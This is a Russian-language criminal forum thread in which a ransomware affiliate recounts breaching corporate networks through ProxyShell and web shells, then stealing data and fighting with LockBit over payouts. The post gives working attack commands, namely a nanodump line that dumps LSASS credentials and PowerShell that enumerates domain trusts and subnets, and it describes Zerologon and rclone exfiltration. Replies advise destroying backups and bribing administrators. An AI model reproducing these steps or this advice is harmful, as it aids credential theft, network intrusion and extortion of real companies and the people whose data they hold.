• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Слава Байдену, ибантяям слава!

грибодемон

RAID-массив
Пользователь
Регистрация
19.02.2022
Сообщения
78
Реакции
123
Предистория
После тридцать пятого поставленного фортика и четырёх месяцев без выплат настроение было говняно поникшим, в голове одно: фаер пид#раст фортики задрочил все.
после недолких раздумий и пары сигарет решил перейти в режим пиявки-подсоса, т.е. брать доступы в отработку у всех кого знаю и не знаю.
Так получилось выйти на команду ребят среди которых был некий ПД (ник изменён), этот ПД был настроящим п#дорасом поскольку его роль заключалась в том,
что бы зайти на вебшелл (https -> cmd) и кинуть туда закреп в виде ани или rmm какого нибудь. И когда я такой весь из себя охуенный вкурил минут за 30 как туда подключаться и бросать
закреп, а далее за выходные отработал с ребятами 4 доступа пока ПД был в оффлайне (детей насиловал наверное), он в штаны накакал и гнать на меня начал аля это я вам икслоит с гитхаба дал значит доступы мои и я не хочу видеть его в команде. С этих доступов один всё таки проплатился и я понял для себя одну вещь. Источник решает всё.
Мобилизировал проксишелл експлоетер на своём серваке, попутно в конвульсиях переписывая скрипт что бы он не жрал все 30 гигов памяти на хосте
бирхост прости за три сообщений на дню с просьбой перезапустить сервак
И уже сам с ребятами делал какой никакой кеш.

Случилось самое страшное и неизбежное. Таргеты кончились, и сигареты тоже, второе кстати было хуже.

Начало
Лучше сети ставить чем у кого-то занимать

Ну не страшно думаю я, режим пиявки тоже не такой уж и плохой. Так проходит месяц, и как боженька послал моему партнёру узнать про новый эксп,
я включив режим аутистапетониста переписал ПоК на рабочий массовый лад, и погнал..

смотрю что выпало и понимаю как же нам фортануло то:

сошлись на том что ягуар тоже в ру есть а значит аксиомой идёт кушать жопу в сторонку, и полезли в совос.
и тут жопу покушали уже мы, об этом будет дальше..

пытаюсь юзера сделать локального что бы на хост войти уже, под политику паролей
подошёл только такой:
BDp!doras1266@ (ПД это ни в коем случае не отсылка к тебе, не подумай, ты самый лучший пендос, честное локбитовское)
поднялись сняв нанодампом lsass https://github.com/helpsystems/nanodump
Код:
nanodump --malseclogon --fork --valid --write C:\Windows\Temp\lsass.dmp

эта метода даёт снять лсас даже с защитой памяти от тёти-совхозасофоса
окей, DA есть, дальше надо двигаться на трасты
делаем по данной методе: https://adsecurity.org/?p=1588
тк за повышение-передвижение отвечаю я, соответственно этим я и занялся, второй тимейт в катке помог взять другой домен зерологином.
трасты такой командой проверял, запускаем от DA\EA на DC:
Код:
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter '(objectClass=trustedDomain)' | select name,objectguid

подсети снимаем так:
Код:
$sites = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites        

foreach ($site in $sites) {
    write-host "(site) $site"
    foreach ($subnet in $site.Subnets) {
        write-host "....(subnet) $subnet"
        foreach ($server in $site.Servers) {
            write-host "........(server) $server"
        }
    }
}

Завязка
Зрачки всё шире шире, а выплата всё ближе ближе..

Поднялись сидим радуемся, решаю я поспать или фильм посмотреть чтоб на выхах дату лить, и чёт стрёмно так стало,
в общем заходим в сеть говорю давайте дату лить а онлайн только я и второй человек из команды.

Я сижу на дев серваке, он по докам. Ищу-ищу сорсы несчастные в девелоперском домене, и нахожу, даже не знаю радоваться или плакать.
Сетка..
Совос...
пол лярда рев....
Софт управления налогами....
ДЕЛФИ (паскаль на стероидах)

боже правый думаю я, что це за пiздец
гружу рклон начинаю сливать эту жемчижину кодерского мастерства скорее всего индийского происхождения к себе на сервак, и..
боты начинают гаснуть как лампочки в фильме ужасов, ну в голове у меня сайлент хилл был уж точно, не меньше.
а я примерно с таким выражением лица сижу, и смотрю на гаснущий свет лучика надежды получить заветный лям баксов

1647295735000.png


быстро собираюсь с мыслями,
и со скоростью солевого наркомана начинаю быстро быстро лить дату, в итоге что-то там я на двадцать гигабайтов я слил, благо до этого из дочки
fiscalreps собрали 130 гб даты персональной, хоть и старой. второй тоже что-то льёт, находит NDA с бинансом, крипто ком и тп.
[вырезана полит.фраза]

Эпилог
Мы убежим, всё будет просто, сеть упадёт, небо уронит, а админ на перекрётске, нас не догонит нас не догонит

Сидим с командой обсуждаем что-то там про СЕОшника зажимавшего девочку брачного возраста по японским законам, что-то
про гроб и ящик розовых приспособлений для прочистки труб для executive team, что-то про локбит и альфупвп у которого на
каждое окно своя сессия чата, и ничего не увидеть что там творится если самому по айди войти, и как так выходит что со всех пп с такой
системой чатов выплат мы почти не видим, о чём-то мирском и накипевшем болтаем одним словом.

с помощью психотронного оружия прозвона вытаскивам сеть в чат, а дальше так:
1647297192800.png

1647297215300.png

и так второй раз подряд, сеть не пришла в день выплаты, закрадываются еретические мысли про локбит и его схема одно окно-одна сессия и возможный скам.
но эти мысли я отгоняю, это же локбит, он же наебать не может, в каждой теме пишет, ему то репутация уже точно важна!
веришь?

С переменным успехом отрабатываем остальные таргеты, с болью за родину родную смотрю какие топовые корпы у нас попались в лог, думаю
как бы им сообщить то так чтоб в говняшку какашку не сесть в процессе, но про это уже когда нибудь потом
 
Последнее редактирование модератором:
Пожалуйста, обратите внимание, что пользователь заблокирован
и так второй раз подряд, сеть не пришла в день выплаты, закрадываются еретические мысли про локбит и его схема одно окно-одна сессия и возможный скам.
но эти мысли я отгоняю, это же локбит, он же наебать не может, в каждой теме пишет, ему то репутация уже точно важна!
веришь?
Назови мне хоть одну партнёрку, с автоматической выгрузкой спизженных данных в блог своими руками? Назови мне хоть одну партнёрку, где нету лимитов на ревеню таргета? Назови мне хоть одну партнёрку кто живёт 3 года? Ты можешь в блог выкладывать данные хоть с лоченого дедика, сам лично своими руками, на каждый таргет. По твоему я тебя буду скамить на бабки, а ты в это время в блоге релизить спизженные данные компании, которая заплатила мне тайком, и об этом никто никогда не узнает? Попробуй развивать свой скилл в поисках бекапов, научись уничтожать тейпы и облачные хранилища, подкупай сис админа компании, развивайся, в конце концов бери по 3 копейки выкуп, если ты не можешь психологически выдержать отсутствие выплат или бегай по партнёркам в надежде на то, что найдешь ту, которая никогда тебя не заскамит.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ельцин с алиэкспресс

По просьбам
и вот это "твое" творение совсем не твое)) скрипт с гитхаба))
 
Последнее редактирование:
ельцин с алиэкспресс


и вот это "твое" творение совсем не твое)) скрипт с гитхаба))
Попросили скинуть скрипт который не жрёт память весь на сервере, я его сбросил, переписанный. Называется scanner.py
Так-же proxyshell_dev.py с заменённым манифестом, оригинал не работает, пришлось копать в чём проблема, и оказалась в манифесте в функции
drop_shell
 
Пожалуйста, обратите внимание, что пользователь заблокирован
На авторство я не притендую, писал же что poc'ы переписываю, что ты с плеча рубишь то)
нихуя я не рублю, если бы я это не сказал, то ты 100% вероятностью сказал бы что ты автор скрипта))
 
Назови мне хоть одну партнёрку, с автоматической выгрузкой спизженных данных в блог своими руками? Назови мне хоть одну партнёрку, где нету лимитов на ревеню таргета? Назови мне хоть одну партнёрку кто живёт 3 года? Ты можешь в блог выкладывать данные хоть с лоченого дедика, сам лично своими руками, на каждый таргет. По твоему я тебя буду скамить на бабки, а ты в это время в блоге релизить спизженные данные компании, которая заплатила мне тайком, и об этом никто никогда не узнает? Попробуй развивать свой скилл в поисках бекапов, научись уничтожать тейпы и облачные хранилища, подкупай сис админа компании, развивайся, в конце концов бери по 3 копейки выкуп, если ты не можешь психологически выдержать отсутствие выплат или бегай по партнёркам в надежде на то, что найдешь ту, которая никогда тебя не заскамит.
мы их не шифранули даже, обе конторы из-за даты писали, и видели листинг, и готовы были платить.
им сливаться в день оплаты просто глупо.
 
Тему в закреп нахуй!

Согласен пиздец почерк Ельцина. Кто там выше писал. Одно в одно. Фортики в начале и пошло-поехало

Кстати раз уж за форточку пошла тема. Есть такой трабл, что при коннекте на некоторых фортиках отпадает коннект к деду. То есть клиент работает как впн, айпи деда меняет. Как фиксить без изпользования виртуалки на деде? С уважением
 
Пожалуйста, обратите внимание, что пользователь заблокирован
мы их не шифранули даже, обе конторы из-за даты писали, и видели листинг, и готовы были платить.
им сливаться в день оплаты просто глупо.
Тем более, зачем ты х#йню какую-то придумываешь про скам? выложил в блог их данные и всё.
 
Я только сейчас понял, что это конкурс статей)) Пиздец. Думал типа притензия к локбиту красиво расписанная. Короче статья из темы "Вы думали я вас не переиграю" Опять форти, опять локбит в конце и бирхост. Только в том топике была притензия что esxi не шифровал то ли записка у локбита х#йня. И пиар хостера бирхоста. Сколько бирхост тебе плотит за рекламу? Или серваки бесплатно даёт?
 
Are you guys banning Ransom or promoting it?
What the fuck?
Quake3, admin
туморроу будет евро ассоцейшен националсейшен ноу криминалити
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
мы их не шифранули даже, обе конторы из-за даты писали, и видели листинг, и готовы были платить.
им сливаться в день оплаты просто глупо.
скажу тебе так, все партнерки где есть ЧАТ а не почта можешь их считать на??ом ,так же мои друзья ушли с одной из самых известных и самых крутых вплане выплат партнерки (мейз ) сидели себе рубили лямы и тут решили на лям кинуть)) за лям убить корову которая давала лямы .....
людской фактор)), для меня чат и партнерки публичные умерли в 19-20тых годах) про то что они с сервисами там всякими работают я уже молчу)) , это тебе платный урок) п.с. мирного неба над головой)
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Are you guys banning Ransom or promoting it?
Обсуждать можно, запрещена работа (комерц), т.е. продажа шифровальщиков, партнерские программы и подобное.
Обсуждение это такое дело, если перегибать палку, то можно и винапи запретить, т.к. вдруг чел, который спрашивает о каком-то тредпуле, пилит локер.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх